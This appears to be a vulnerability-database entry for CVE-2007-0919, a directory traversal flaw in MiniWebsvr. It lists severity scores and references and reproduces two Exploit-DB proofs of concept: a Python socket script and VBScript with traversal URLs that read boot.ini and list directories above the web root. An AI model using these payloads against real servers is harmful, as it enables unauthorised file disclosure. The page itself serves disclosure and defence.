CVE-2007-0919
Published 2007-02-14
CVE-2007-0919: Directory traversal vulnerability in Nickolas Grigoriadis Mini Web server (MiniWebsvr) 0.0.6 allows remote attackers to list the directory immediately above…
Priority P3 · 40 · high
CVSS 2.0: 7.8 (AV:N/AC:L/Au:N/C:C/I:N/A:N)
EXPLOIT
EPSS: 3.65% (88.2th percentile)
Directory traversal vulnerability in Nickolas Grigoriadis Mini Web server (MiniWebsvr) 0.0.6 allows remote attackers to list the directory immediately above the web root via a ..%00 sequence in the URI.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| nickolas_grigoriadis | mini_web_server | — | — |
No detection rules found.
Exploit-DB
MiniWebsvr 0.0.9a - Remote Directory Traversal
exploitdb·2008-03-03
---
```python
import socket
import sys

print '---------------------------------------------------------'
print 'MiniWebSvr 0.0.9a Directory Transversal Vulnerability'
print 'Project URL: http://miniwebsvr.sourceforge.net/'
print 'Author: gbr'
print 'Tested on Windows XP SP2'
print '---------------------------------------------------------'

host = "127.0.0.1"
port = 8080
if sys.argv[1:]:
    host = sys.argv[1]
if sys.argv[2:]:
    port = int(sys.argv[2])

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    s.send("GET /%../../../../../../../../../../../boot.ini HTTP/1.0\r\n\r\n")
    while True:
        data = s.recv(4096)
        if not data:
            break
        print data
except:
    print "Connection Error"

# milw0rm.com [2008-03-03]
```
Exploit-DB
MiniWebsvr 0.0.7 - Remote Directory Traversal
exploitdb·2007-04-11
---
MiniWebsvr 0.0.7 Directory transversal vulnerability
url: http://miniwebsvr.sourceforge.net/
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
http://localhost/%5C..%5C..%5C..%5C..%5C..%5C../boot.ini or
http://localhost/%5C..%5C..%5C..%5C..%5C..%5C../
Host Port
```vbscript
Sub GetBoot
    on error resume next
    document.location = "http://" + txtIP.value + ":" + txtPort.value + "/%5C..%5C..%5C..%5C..%5C..%5C../boot.ini"
end sub

Sub BrowseMe
    on error resume next
    document.location = "http://" + txtIP.value + ":" + txtPort.value + "/%5C..%5C..%5C..%5C..%5C..%5C../"
end sub
```
# milw0rm.com [2007-04-11]
No writeups or analysis indexed.
http://attrition.org/pipermail/vim/2007-February/001315.html
http://osvdb.org/33513
http://securityreason.com/securityalert/2248
http://www.securityfocus.com/archive/1/459829/100/0/threaded
http://www.securityfocus.com/bid/22523
https://exchange.xforce.ibmcloud.com/vulnerabilities/32451